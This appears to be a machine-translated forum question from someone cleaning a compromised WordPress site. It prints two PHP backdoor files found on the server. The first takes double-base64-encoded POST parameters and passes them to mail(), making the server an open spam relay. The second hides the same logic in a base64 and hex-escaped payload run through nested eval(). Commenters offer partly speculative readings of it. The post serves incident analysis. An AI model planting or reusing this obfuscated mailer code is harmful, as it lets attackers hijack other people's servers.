所以我一直在幫助一個在wordpress上在godaddy服務器上遭受惡意軟件攻擊的人。我想我已經刪除了導致問題的代碼,但我只是好奇這個php在做什麼,好像它循環存儲在POST中的變量並試圖解碼任何信息,然後通過電子郵件發送。有人能幫我理解這一點嗎?乾杯對服務器的PHP攻擊,這段代碼在做什麼?
<?php
$data = array('');
foreach ($_POST as $key => $value) {
array_push($data, $value);
}
$jxWnO = stripslashes(base64_decode(base64_decode($data[1])));
$e2WPWta = stripslashes(base64_decode(base64_decode($data[2])));
$hwrDZxfxhl = stripslashes(base64_decode(base64_decode($data[3])));
$JQiQiWf3Pg = stripslashes(base64_decode(base64_decode($data[4])));
$Fr2ZEIZYuKj = mail(stripslashes($jxWnO), stripslashes($e2WPWta), stripslashes($hwrDZxfxhl), stripslashes($JQiQiWf3Pg));
if ($Fr2ZEIZYuKj) {
echo $Fr2ZEIZYuKj;
} else {
echo '99';
}
?>
然後在一個單獨的文件:
<?php $code=base64_decode("XCRfZjJkZGFkYjBkZDUwNjdiODNjMjA0NDk2NmMwNDFiYWMgPSBhcnJheSgnJyk7IFx4NjZceDZGXHg3Mlx4NjVceDYxXHg2M1x4NjggKFwkXHg1Rlx4NTBceDRGXHg1M1x4NTQgYXMgXCRfN2Q1MDQ1ZTBmNTU5ODI4MzY4ODhiOGVmN2U4M2QzNzBlOTlmMjU4NGQxNzNhNmQ0MDRkNTQzNWQ1NWE3OGQ1NzBhNjk4ZWFhNDdmNDQ4NmJhNGVjYTg1MGJhMjgxMjQ3MmZkMjc0NmUzMzQ4MDI0NzY2ZWI5MzNlOTFjYTE5NWMgPT4gXCRfYzMxMGE5MGI0NjcxNGZhOTYzMzk0MTkwYjEyYThjNjFhYWFlNDk1Y2RhODE4ZTA5OWVkNmExYmUpIHtceDYxXHg3Mlx4NzJceDYxXHg3OVx4NUZceDcwXHg3NVx4NzNceDY4KFwkX2YyZGRhZGIwZGQ1MDY3YjgzYzIwNDQ5NjZjMDQxYmFjLCBcJF9jMzEwYTkwYjQ2NzE0ZmE5NjMzOTQxOTBiMTJhOGM2MWFhYWU0OTVjZGE4MThlMDk5ZWQ2YTFiZSk7fSBcJF9jNTNmOTg1NjJiYjM2M2RhNzE5YjBjNDQ2ZGQ4YzBhMTVjZWJmNDVhID0gXHg3M1x4NzRceDcyXHg2OVx4NzBceDczXHg2Q1x4NjFceDczXHg2OFx4NjVceDczKFx4NjJceDYxXHg3M1x4NjVceDM2XHgzNFx4NUZceDY0XHg2NVx4NjNceDZGXHg2NFx4NjUoXHg2Mlx4NjFceDczXHg2NVx4MzZceDM0XHg1Rlx4NjRceDY1XHg2M1x4NkZceDY0XHg2NShcJF9mMmRkYWRiMGRkNTA2N2I4M2MyMDQ0OTY2YzA0MWJhY1sxXSApKSk7IFwkXzhkMzQxZGM0ZjliZDM1YzdlOTQ1YmIxODJjM2Q0YzY4MjA0NTBhZWFmNGM2N2NmYThjYTkyZjBhOGFjOTI5MTEzZDdjZTRiYTA4NmE5ZGVmMzg5M2VlMjYwODgyNjUxOWFhYzI4YmIxZDM5NzZhMzZkZDU1NTBhMGVmZjdjNTYzID0gXHg3M1x4NzRceDcyXHg2OVx4NzBceDczXHg2Q1x4NjFceDczXHg2OFx4NjVceDczKFx4NjJceDYxXHg3M1x4NjVceDM2XHgzNFx4NUZceDY0XHg2NVx4NjNceDZGXHg2NFx4NjUoXHg2Mlx4NjFceDczXHg2NVx4MzZceDM0XHg1Rlx4NjRceDY1XHg2M1x4NkZceDY0XHg2NShcJF9mMmRkYWRiMGRkNTA2N2I4M2MyMDQ0OTY2YzA0MWJhY1syXSApKSk7IFwkX2RkYmU1ZDM5ID0gXHg3M1x4NzRceDcyXHg2OVx4NzBceDczXHg2Q1x4NjFceDczXHg2OFx4NjVceDczKFx4NjJceDYxXHg3M1x4NjVceDM2XHgzNFx4NUZceDY0XHg2NVx4NjNceDZGXHg2NFx4NjUoXHg2Mlx4NjFceDczXHg2NVx4MzZceDM0XHg1Rlx4NjRceDY1XHg2M1x4NkZceDY0XHg2NShcJF9mMmRkYWRiMGRkNTA2N2I4M2MyMDQ0OTY2YzA0MWJhY1szXSApKSk7IFwkXzAyMDNhYzU4NjU5YTllNTAxNDA4YjkxZGYyYzliNjFhMTFiM2EzODNiY2IzZGEwYmJmNTJhMTdiYTAwZDkwODggPSBceDczXHg3NFx4NzJceDY5XHg3MFx4NzNceDZDXHg2MVx4NzNceDY4XHg2NVx4NzMoXHg2Mlx4NjFceDczXHg2NVx4MzZceDM0XHg1Rlx4NjRceDY1XHg2M1x4NkZceDY0XHg2NShceDYyXHg2MVx4NzNceDY1XHgzNlx4MzRceDVGXHg2NFx4NjVceDYzXHg2Rlx4NjRceDY1KFwkX2YyZGRhZGIwZGQ1MDY3YjgzYzIwNDQ5NjZjMDQxYmFjWzRdICkpKTsgXCRfOWUyYjE3Njk3NjcyNGFiZmU1YjI3NGYyNWQyM2UwNWExMTAwNmUyZDgzMTVjNTRiOWZkZTEyOTNjYWI2MmJiZSA9IFx4NkRceDYxXHg2OVx4NkMoXHg3M1x4NzRceDcyXHg2OVx4NzBceDczXHg2Q1x4NjFceDczXHg2OFx4NjVceDczKFwkX2M1M2Y5ODU2MmJiMzYzZGE3MTliMGM0NDZkZDhjMGExNWNlYmY0NWEpLCBceDczXHg3NFx4NzJceDY5XHg3MFx4NzNceDZDXHg2MVx4NzNceDY4XHg2NVx4NzMoXCRfOGQzNDFkYzRmOWJkMzVjN2U5NDViYjE4MmMzZDRjNjgyMDQ1MGFlYWY0YzY3Y2ZhOGNhOTJmMGE4YWM5MjkxMTNkN2NlNGJhMDg2YTlkZWYzODkzZWUyNjA4ODI2NTE5YWFjMjhiYjFkMzk3NmEzNmRkNTU1MGEwZWZmN2M1NjMpLCBceDczXHg3NFx4NzJceDY5XHg3MFx4NzNceDZDXHg2MVx4NzNceDY4XHg2NVx4NzMoXCRfZGRiZTVkMzkpLCBceDczXHg3NFx4NzJceDY5XHg3MFx4NzNceDZDXHg2MVx4NzNceDY4XHg2NVx4NzMoXCRfMDIwM2FjNTg2NTlhOWU1MDE0MDhiOTFkZjJjOWI2MWExMWIzYTM4M2JjYjNkYTBiYmY1MmExN2JhMDBkOTA4OCkpOyBceDY5XHg2NiAoXCRfOWUyYjE3Njk3NjcyNGFiZmU1YjI3NGYyNWQyM2UwNWExMTAwNmUyZDgzMTVjNTRiOWZkZTEyOTNjYWI2MmJiZSl7IFx4NjVceDYzXHg2OFx4NkYgXCRfOWUyYjE3Njk3NjcyNGFiZmU1YjI3NGYyNWQyM2UwNWExMTAwNmUyZDgzMTVjNTRiOWZkZTEyOTNjYWI2MmJiZTt9IGVsc2UgeyBceDY1XHg2M1x4NjhceDZGICdceDM5XHgzOSc7fQ=="); eval("return eval(\"$code\");") ?>
如果你這樣做會產生'$代碼中,BASE64_DECODE()',你會發現一個很大的十六進制混淆的字符串(例如:'\ $ _ f2ddadb0dd5067b83c2044966c041bac = array(''); \ x66 \ x6F \ x72 \ x65 \ x61 \ x63 \ x68')它確實有惡意,但很難翻譯成可讀的內容。最後,它是'eval()''d。這裏的'mail()'調用可能只是一個回調,讓攻擊者知道它是成功的,但是無論這個做的是什麼,都是在那個模糊的eval'd代碼中。 –
可能(基於知識,經驗猜測,而不是實際解碼這裏發佈的內容),來自'$ _POST'的東西形成了一個大型eval惡意代碼的命令接口。 –
單獨的文件 - 是否包含/需要與$ _POST的東西文件?如果不是,則不清楚這兩者之間的關係,因爲$ _POST/mail()代碼中沒有評估任何東西。 –